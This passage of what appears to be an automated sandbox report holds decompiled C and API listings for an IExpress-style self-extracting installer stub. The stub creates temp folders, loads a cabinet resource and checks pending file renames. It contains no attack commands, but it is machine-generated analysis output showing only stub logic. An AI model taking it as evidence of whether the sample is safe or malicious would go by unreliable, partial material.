                                                                      					__imp__#20(E00F84CA0, E00F84CC0, E00F84980, E00F84A50, E00F84AD0, E00F84B60, E00F84BC0, 1, 0xf89148, _t33);
                                                                      					_t34 = _t10;
                                                                      					if(_t34 == 0) {
                                                                      						L8:
                                                                      						_t29 =  *0xf89148; // 0x0
                                                                      						_t24 =  *0xf88584; // 0x0
                                                                      						E00F844B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                      						_t37 = 0;
                                                                      						L9:
                                                                      						goto L10;
                                                                      					}
                                                                      					__imp__#22(_t34, "*MEMCAB", 0xf81140, 0, E00F84CD0, 0, 0xf89140); // executed
                                                                      					_t37 = _t10;
                                                                      					if(_t37 == 0) {
                                                                      						goto L9;
                                                                      					}
                                                                      					__imp__#23(_t34); // executed
                                                                      					if(_t10 != 0) {
                                                                      						goto L9;
                                                                      					}
                                                                      					goto L8;
                                                                      				} else {
                                                                      					_t27 =  *0xf88584; // 0x0
                                                                      					E00F844B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                      					_t37 = 0;
                                                                      					L10:
                                                                      					_t12 =  *0xf89140; // 0x0
                                                                      					if(_t12 != 0) {
                                                                      						FreeResource(_t12);
                                                                      						 *0xf89140 = 0;
                                                                      					}
                                                                      					if(_t37 == 0) {
                                                                      						_t47 =  *0xf891d8; // 0x0
                                                                      						if(_t47 == 0) {
                                                                      							E00F844B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                      						}
                                                                      					}
                                                                      					if(( *0xf88a38 & 0x00000001) == 0 && ( *0xf89a34 & 0x00000001) == 0) {
                                                                      						SendMessageA( *0xf88584, 0xfa1, _t37, 0);
                                                                      					}
                                                                      					return _t37;
                                                                      				}
                                                                      			}
















                                                                      0x00f84fe0
                                                                      0x00f84fe6
                                                                      0x00f84ff9
                                                                      0x00f8500d
                                                                      0x00f85013
                                                                      0x00f8501a
                                                                      0x00f85163
                                                                      0x00f85163
                                                                      0x00f85020
                                                                      0x00f85027
                                                                      0x00f85037
                                                                      0x00f85051
                                                                      0x00f85051
                                                                      0x00f85057
                                                                      0x00f8505e
                                                                      0x00f850a7
                                                                      0x00f850ad
                                                                      0x00f850b4
                                                                      0x00f850e8
                                                                      0x00f850e8
                                                                      0x00f850ee
                                                                      0x00f850ff
                                                                      0x00f85104
                                                                      0x00f85106
                                                                      0x00000000
                                                                      0x00f85106
                                                                      0x00f850cd
                                                                      0x00f850d3
                                                                      0x00f850da
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f850dd
                                                                      0x00f850e6
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f85060
                                                                      0x00f85060
                                                                      0x00f85070
                                                                      0x00f85075
                                                                      0x00f85107
                                                                      0x00f85107
                                                                      0x00f8510e
                                                                      0x00f85111
                                                                      0x00f85117
                                                                      0x00f85117
                                                                      0x00f8511f
                                                                      0x00f85121
                                                                      0x00f85127
                                                                      0x00f85135
                                                                      0x00f85135
                                                                      0x00f85127
                                                                      0x00f85141
                                                                      0x00f85159
                                                                      0x00f85159
                                                                      0x00000000
                                                                      0x00f8515f

                                                                      APIs
                                                                        • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846A0
                                                                        • Part of subcall function 00F8468F: SizeofResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846A9
                                                                        • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846C3
                                                                        • Part of subcall function 00F8468F: LoadResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846CC
                                                                        • Part of subcall function 00F8468F: LockResource.KERNEL32(00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846D3
                                                                        • Part of subcall function 00F8468F: memcpy_s.MSVCRT ref: 00F846E5
                                                                        • Part of subcall function 00F8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846EF
                                                                      • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00F84FFE
                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 00F85006
                                                                      • LockResource.KERNEL32(00000000), ref: 00F8500D
                                                                      • GetDlgItem.USER32(00000000,00000842), ref: 00F85030
                                                                      • ShowWindow.USER32(00000000), ref: 00F85037
                                                                      • GetDlgItem.USER32(00000841,00000005), ref: 00F8504A
                                                                      • ShowWindow.USER32(00000000), ref: 00F85051
                                                                      • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00F85111
                                                                      • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00F85159
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                      • String ID: *MEMCAB$CABINET
                                                                      • API String ID: 1305606123-2642027498
                                                                      • Opcode ID: 9fd27aa6d8d8b7886dafaa694a9eb78d1e5de37c86c2a8ad19fbd96555bd9e79
                                                                      • Instruction ID: 919f73e338f55c4df8eaa356bf5c72729e50ca02cf3ea1352f7d2d173871e4e0
                                                                      • Opcode Fuzzy Hash: 9fd27aa6d8d8b7886dafaa694a9eb78d1e5de37c86c2a8ad19fbd96555bd9e79
                                                                      • Instruction Fuzzy Hash: 4331B870B44B0A7BE7207B61AD8DFF7365DE744FA5F080015F902A62A1DAB9DC01B761
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      C-Code - Quality: 95%
                                                                      			E00F853A1(CHAR* __ecx, CHAR* __edx) {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t5;
                                                                      				long _t13;
                                                                      				int _t14;
                                                                      				CHAR* _t20;
                                                                      				int _t29;
                                                                      				int _t30;
                                                                      				CHAR* _t32;
                                                                      				signed int _t33;
                                                                      				void* _t34;
                                                                      
                                                                      				_t5 =  *0xf88004; // 0x644c7055
                                                                      				_v8 = _t5 ^ _t33;
                                                                      				_t32 = __edx;
                                                                      				_t20 = __ecx;
                                                                      				_t29 = 0;
                                                                      				while(1) {
                                                                      					E00F8171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                      					_t34 = _t34 + 0x10;
                                                                      					_t29 = _t29 + 1;
                                                                      					E00F81680(_t32, 0x104, _t20);
                                                                      					E00F8658A(_t32, 0x104,  &_v268); // executed
                                                                      					RemoveDirectoryA(_t32); // executed
                                                                      					_t13 = GetFileAttributesA(_t32); // executed
                                                                      					if(_t13 == 0xffffffff) {
                                                                      						break;
                                                                      					}
                                                                      					if(_t29 < 0x190) {
                                                                      						continue;
                                                                      					}
                                                                      					L3:
                                                                      					_t30 = 0;
                                                                      					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                      						_t30 = 1;
                                                                      						DeleteFileA(_t32);
                                                                      						CreateDirectoryA(_t32, 0);
                                                                      					}
                                                                      					L5:
                                                                      					return E00F86CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                      				}
                                                                      				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                      				if(_t14 == 0) {
                                                                      					goto L3;
                                                                      				}
                                                                      				_t30 = 1;
                                                                      				 *0xf88a20 = 1;
                                                                      				goto L5;
                                                                      			}

















                                                                      0x00f853ac
                                                                      0x00f853b3
                                                                      0x00f853b9
                                                                      0x00f853bb
                                                                      0x00f853bd
                                                                      0x00f853bf
                                                                      0x00f853d1
                                                                      0x00f853d6
                                                                      0x00f853e0
                                                                      0x00f853e2
                                                                      0x00f853f5
                                                                      0x00f853fb
                                                                      0x00f85402
                                                                      0x00f8540b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f85413
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f85415
                                                                      0x00f85416
                                                                      0x00f85427
                                                                      0x00f8542a
                                                                      0x00f8542b
                                                                      0x00f85434
                                                                      0x00f85434
                                                                      0x00f8543a
                                                                      0x00f8544c
                                                                      0x00f8544c
                                                                      0x00f85452
                                                                      0x00f8545a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f8545e
                                                                      0x00f8545f
                                                                      0x00000000

                                                                      APIs
                                                                        • Part of subcall function 00F8171E: _vsnprintf.MSVCRT ref: 00F81750
                                                                      • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F853FB
                                                                      • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F85402
                                                                      • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F8541F
                                                                      • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F8542B
                                                                      • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F85434
                                                                      • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F85452
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$IXP$IXP%03d.TMP
                                                                      • API String ID: 1082909758-4044985724
                                                                      • Opcode ID: 529d431f5f3824b96a9ff25301eecc8a653d5158ef20de90f8bf2c7841398568
                                                                      • Instruction ID: 1f9009007443b4ea1778144da670676d0015093c884ae24278484a89029772b5
                                                                      • Opcode Fuzzy Hash: 529d431f5f3824b96a9ff25301eecc8a653d5158ef20de90f8bf2c7841398568
                                                                      • Instruction Fuzzy Hash: 3011E77170050867E720BB369C49FFF766DEFC5721F000126F646D2190DE788947A7A2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 478 f85467-f85484 479 f8548a-f85490 call f853a1 478->479 480 f8551c-f85528 call f81680 478->480 483 f85495-f85497 479->483 484 f8552d-f85539 call f858c8 480->484 485 f8549d-f854c0 call f81781 483->485 486 f85581-f85583 483->486 493 f8553b-f85545 CreateDirectoryA 484->493 494 f8554d-f85552 484->494 495 f8550c-f8551a call f8658a 485->495 496 f854c2-f854d8 GetSystemInfo 485->496 489 f8558d-f8559d call f86ce0 486->489 498 f85577-f8557c call f86285 493->498 499 f85547 493->499 500 f85554-f85557 call f8597d 494->500 501 f85585-f8558b 494->501 495->484 502 f854da-f854dd 496->502 503 f854fe 496->503 498->486 499->494 511 f8555c-f8555e 500->511 501->489 509 f854df-f854e2 502->509 510 f854f7-f854fc 502->510 512 f85503-f85507 call f8658a 503->512 513 f854f0-f854f5 509->513 514 f854e4-f854e7 509->514 510->512 511->501 515 f85560-f85566 511->515 512->495 513->512 514->495 517 f854e9-f854ee 514->517 515->486 518 f85568-f85575 RemoveDirectoryA 515->518 517->512 518->486
                                                                      C-Code - Quality: 75%
                                                                      			E00F85467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				struct _SYSTEM_INFO _v304;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t10;
                                                                      				void* _t13;
                                                                      				intOrPtr _t14;
                                                                      				void* _t16;
                                                                      				void* _t20;
                                                                      				signed int _t26;
                                                                      				void* _t28;
                                                                      				void* _t29;
                                                                      				CHAR* _t48;
                                                                      				signed int _t49;
                                                                      				intOrPtr _t61;
                                                                      
                                                                      				_t10 =  *0xf88004; // 0x644c7055
                                                                      				_v8 = _t10 ^ _t49;
                                                                      				_push(__ecx);
                                                                      				if(__edx == 0) {
                                                                      					_t48 = 0xf891e4;
                                                                      					_t42 = 0x104;
                                                                      					E00F81680(0xf891e4, 0x104);
                                                                      					L14:
                                                                      					_t13 = E00F858C8(_t48); // executed
                                                                      					if(_t13 != 0) {
                                                                      						L17:
                                                                      						_t42 = _a4;
                                                                      						if(_a4 == 0) {
                                                                      							L23:
                                                                      							 *0xf89124 = 0;
                                                                      							_t14 = 1;
                                                                      							L24:
                                                                      							return E00F86CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                      						}
                                                                      						_t16 = E00F8597D(_t48, _t42, 1, 0); // executed
                                                                      						if(_t16 != 0) {
                                                                      							goto L23;
                                                                      						}
                                                                      						_t61 =  *0xf88a20; // 0x0
                                                                      						if(_t61 != 0) {
                                                                      							 *0xf88a20 = 0;
                                                                      							RemoveDirectoryA(_t48);
                                                                      						}
                                                                      						L22:
                                                                      						_t14 = 0;
                                                                      						goto L24;
                                                                      					}
                                                                      					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                      						 *0xf89124 = E00F86285();
                                                                      						goto L22;
                                                                      					}
                                                                      					 *0xf88a20 = 1;
                                                                      					goto L17;
                                                                      				}
                                                                      				_t42 =  &_v268;
                                                                      				_t20 = E00F853A1(__ecx,  &_v268); // executed
                                                                      				if(_t20 == 0) {
                                                                      					goto L22;
                                                                      				}
                                                                      				_push(__ecx);
                                                                      				_t48 = 0xf891e4;
                                                                      				E00F81781(0xf891e4, 0x104, __ecx,  &_v268);
                                                                      				if(( *0xf89a34 & 0x00000020) == 0) {
                                                                      					L12:
                                                                      					_t42 = 0x104;
                                                                      					E00F8658A(_t48, 0x104, 0xf81140);
                                                                      					goto L14;
                                                                      				}
                                                                      				GetSystemInfo( &_v304);
                                                                      				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                      				if(_t26 == 0) {
                                                                      					_push("i386");
                                                                      					L11:
                                                                      					E00F8658A(_t48, 0x104);
                                                                      					goto L12;
                                                                      				}
                                                                      				_t28 = _t26 - 1;
                                                                      				if(_t28 == 0) {
                                                                      					_push("mips");
                                                                      					goto L11;
                                                                      				}
                                                                      				_t29 = _t28 - 1;
                                                                      				if(_t29 == 0) {
                                                                      					_push("alpha");
                                                                      					goto L11;
                                                                      				}
                                                                      				if(_t29 != 1) {
                                                                      					goto L12;
                                                                      				}
                                                                      				_push("ppc");
                                                                      				goto L11;
                                                                      			}




















                                                                      0x00f85472
                                                                      0x00f85479
                                                                      0x00f85481
                                                                      0x00f85484
                                                                      0x00f8551c
                                                                      0x00f85521
                                                                      0x00f85528
                                                                      0x00f8552d
                                                                      0x00f8552f
                                                                      0x00f85539
                                                                      0x00f8554d
                                                                      0x00f8554d
                                                                      0x00f85552
                                                                      0x00f85585
                                                                      0x00f85585
                                                                      0x00f8558b
                                                                      0x00f8558d
                                                                      0x00f8559d
                                                                      0x00f8559d
                                                                      0x00f85557
                                                                      0x00f8555e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f85560
                                                                      0x00f85566
                                                                      0x00f85569
                                                                      0x00f8556f
                                                                      0x00f8556f
                                                                      0x00f85581
                                                                      0x00f85581
                                                                      0x00000000
                                                                      0x00f85581
                                                                      0x00f85545
                                                                      0x00f8557c
                                                                      0x00000000
                                                                      0x00f8557c
                                                                      0x00f85547
                                                                      0x00000000
                                                                      0x00f85547
                                                                      0x00f8548a
                                                                      0x00f85490
                                                                      0x00f85497
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f8549d
                                                                      0x00f854ab
                                                                      0x00f854b4
                                                                      0x00f854c0
                                                                      0x00f8550c
                                                                      0x00f85511
                                                                      0x00f85515
                                                                      0x00000000
                                                                      0x00f85515
                                                                      0x00f854c9
                                                                      0x00f854d6
                                                                      0x00f854d8
                                                                      0x00f854fe
                                                                      0x00f85503
                                                                      0x00f85507
                                                                      0x00000000
                                                                      0x00f85507
                                                                      0x00f854da
                                                                      0x00f854dd
                                                                      0x00f854f7
                                                                      0x00000000
                                                                      0x00f854f7
                                                                      0x00f854df
                                                                      0x00f854e2
                                                                      0x00f854f0
                                                                      0x00000000
                                                                      0x00f854f0
                                                                      0x00f854e7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f854e9
                                                                      0x00000000

                                                                      APIs
                                                                      • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F854C9
                                                                      • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F8553D
                                                                      • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F8556F
                                                                        • Part of subcall function 00F853A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F853FB
                                                                        • Part of subcall function 00F853A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F85402
                                                                        • Part of subcall function 00F853A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F8541F
                                                                        • Part of subcall function 00F853A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F8542B
                                                                        • Part of subcall function 00F853A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F85434
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$alpha$i386$mips$ppc
                                                                      • API String ID: 1979080616-3963195772
                                                                      • Opcode ID: b1a7f2beff07830a5407aa7bf735c093541617e15bf54abf46a8b67381a72a68
                                                                      • Instruction ID: bc241b1177b749ffbc824f119cf3311f203d3b554e0798736eaf3e8210702c85
                                                                      • Opcode Fuzzy Hash: b1a7f2beff07830a5407aa7bf735c093541617e15bf54abf46a8b67381a72a68
                                                                      • Instruction Fuzzy Hash: F4312971F04A045BCF10BF299C496FF779FAB81F54B0C016AA402CA540DB74CE06B795
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 519 f8256d-f8257d 520 f82622-f82627 call f824e0 519->520 521 f82583-f82589 519->521 526 f82629-f8262f 520->526 522 f825e8-f82607 RegOpenKeyExA 521->522 523 f8258b 521->523 528 f82609-f82620 RegQueryInfoKeyA 522->528 529 f825e3-f825e6 522->529 523->526 527 f82591-f82595 523->527 527->526 530 f8259b-f825ba RegOpenKeyExA 527->530 531 f825d1-f825dd RegCloseKey 528->531 529->526 530->529 532 f825bc-f825cb RegQueryValueExA 530->532 531->529 532->531
                                                                      C-Code - Quality: 86%
                                                                      			E00F8256D(signed int __ecx) {
                                                                      				int _v8;
                                                                      				void* _v12;
                                                                      				signed int _t13;
                                                                      				signed int _t19;
                                                                      				long _t24;
                                                                      				void* _t26;
                                                                      				int _t31;
                                                                      				void* _t34;
                                                                      
                                                                      				_push(__ecx);
                                                                      				_push(__ecx);
                                                                      				_t13 = __ecx & 0x0000ffff;
                                                                      				_t31 = 0;
                                                                      				if(_t13 == 0) {
                                                                      					_t31 = E00F824E0(_t26);
                                                                      				} else {
                                                                      					_t34 = _t13 - 1;
                                                                      					if(_t34 == 0) {
                                                                      						_v8 = 0;
                                                                      						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                      							goto L7;
                                                                      						} else {
                                                                      							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                      							goto L6;
                                                                      						}
                                                                      						L12:
                                                                      					} else {
                                                                      						if(_t34 > 0 && __ecx <= 3) {
                                                                      							_v8 = 0;
                                                                      							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                      							if(_t24 == 0) {
                                                                      								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                      								L6:
                                                                      								asm("sbb eax, eax");
                                                                      								_v8 = _v8 &  !( ~_t19);
                                                                      								RegCloseKey(_v12); // executed
                                                                      							}
                                                                      							L7:
                                                                      							_t31 = _v8;
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				return _t31;
                                                                      				goto L12;
                                                                      			}











                                                                      0x00f82572
                                                                      0x00f82573
                                                                      0x00f82575
                                                                      0x00f82578
                                                                      0x00f8257d
                                                                      0x00f82627
                                                                      0x00f82583
                                                                      0x00f82586
                                                                      0x00f82589
                                                                      0x00f825eb
                                                                      0x00f82607
                                                                      0x00000000
                                                                      0x00f82609
                                                                      0x00f8261a
                                                                      0x00000000
                                                                      0x00f8261a
                                                                      0x00000000
                                                                      0x00f8258b
                                                                      0x00f8258b
                                                                      0x00f8259e
                                                                      0x00f825b2
                                                                      0x00f825ba
                                                                      0x00f825cb
                                                                      0x00f825d1
                                                                      0x00f825d6
                                                                      0x00f825da
                                                                      0x00f825dd
                                                                      0x00f825dd
                                                                      0x00f825e3
                                                                      0x00f825e3
                                                                      0x00f825e3
                                                                      0x00f8258b
                                                                      0x00f82589
                                                                      0x00f8262f
                                                                      0x00000000

                                                                      APIs
                                                                      • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00F84096,00F84096,?,00F81ED3,00000001,00000000,?,?,00F84137,?), ref: 00F825B2
                                                                      • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00F84096,?,00F81ED3,00000001,00000000,?,?,00F84137,?,00F84096), ref: 00F825CB
                                                                      • RegCloseKey.KERNELBASE(?,?,00F81ED3,00000001,00000000,?,?,00F84137,?,00F84096), ref: 00F825DD
                                                                      • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00F84096,00F84096,?,00F81ED3,00000001,00000000,?,?,00F84137,?), ref: 00F825FF
                                                                      • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00F84096,00000000,00000000,00000000,00000000,?,00F81ED3,00000001,00000000), ref: 00F8261A
                                                                      Strings
                                                                      • System\CurrentControlSet\Control\Session Manager, xrefs: 00F825A8
                                                                      • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00F825F5
                                                                      • PendingFileRenameOperations, xrefs: 00F825C3
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: OpenQuery$CloseInfoValue
                                                                      • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                      • API String ID: 2209512893-559176071
                                                                      • Opcode ID: ef950f5a6a8935b6af500e9c7c36b9c9cf68b8555cc58c3bb4ed225a6ec60677
                                                                      • Instruction ID: 3f7f22f73cee6fd3cb285c981160f7b67211c09418aa3547983cb833f8032f69
                                                                      • Opcode Fuzzy Hash: ef950f5a6a8935b6af500e9c7c36b9c9cf68b8555cc58c3bb4ed225a6ec60677
                                                                      • Instruction Fuzzy Hash: E3114235D42228FBAF20AB919C09DFB7FBCDF057A1F544056B808A2011DB30AE45F7A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 533 f86a60-f86a91 call f87155 call f87208 GetStartupInfoW 539 f86a93-f86aa2 533->539 540 f86abc-f86abe 539->540 541 f86aa4-f86aa6 539->541 544 f86abf-f86ac5 540->544 542 f86aa8-f86aad 541->542 543 f86aaf-f86aba Sleep 541->543 542->544 543->539 545 f86ad1-f86ad7 544->545 546 f86ac7-f86acf _amsg_exit 544->546 547 f86ad9-f86ae9 call f86c3f 545->547 548 f86b05 545->548 549 f86b0b-f86b11 546->549 553 f86aee-f86af2 547->553 548->549 551 f86b2e-f86b30 549->551 552 f86b13-f86b24 _initterm 549->552 554 f86b3b-f86b42 551->554 555 f86b32-f86b39 551->555 552->551 553->549 556 f86af4-f86b00 553->556 557 f86b44-f86b51 call f87060 554->557 558 f86b67-f86b71 554->558 555->554 560 f86c39-f86c3e call f8724d 556->560 557->558 571 f86b53-f86b65 557->571 559 f86b74-f86b79 558->559 562 f86b7b-f86b7d 559->562 563 f86bc5-f86bc8 559->563 568 f86b7f-f86b81 562->568 569 f86b94-f86b98 562->569 566 f86bca-f86bd3 563->566 567 f86bd6-f86be3 _ismbblead 563->567 566->567 572 f86be9-f86bed 567->572 573 f86be5-f86be6 567->573 568->563 574 f86b83-f86b85 568->574 575 f86b9a-f86b9e 569->575 576 f86ba0-f86ba2 569->576 571->558 572->559 573->572 574->569 577 f86b87-f86b8a 574->577 578 f86ba3-f86bbc call f82bfb 575->578 576->578 577->569 580 f86b8c-f86b92 577->580 583 f86c1e-f86c25 578->583 584 f86bbe-f86bbf exit 578->584 580->574 585 f86c32 583->585 586 f86c27-f86c2d _cexit 583->586 584->563 585->560 586->585
                                                                      C-Code - Quality: 51%
                                                                      			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                      				signed int* _t25;
                                                                      				signed int _t26;
                                                                      				signed int _t29;
                                                                      				int _t30;
                                                                      				signed int _t37;
                                                                      				signed char _t41;
                                                                      				signed int _t53;
                                                                      				signed int _t54;
                                                                      				intOrPtr _t56;
                                                                      				signed int _t58;
                                                                      				signed int _t59;
                                                                      				intOrPtr* _t60;
                                                                      				void* _t62;
                                                                      				void* _t67;
                                                                      				void* _t68;
                                                                      
                                                                      				E00F87155();
                                                                      				_push(0x58);
                                                                      				_push(0xf872b8);
                                                                      				E00F87208(__ebx, __edi, __esi);
                                                                      				 *(_t62 - 0x20) = 0;
                                                                      				GetStartupInfoW(_t62 - 0x68);
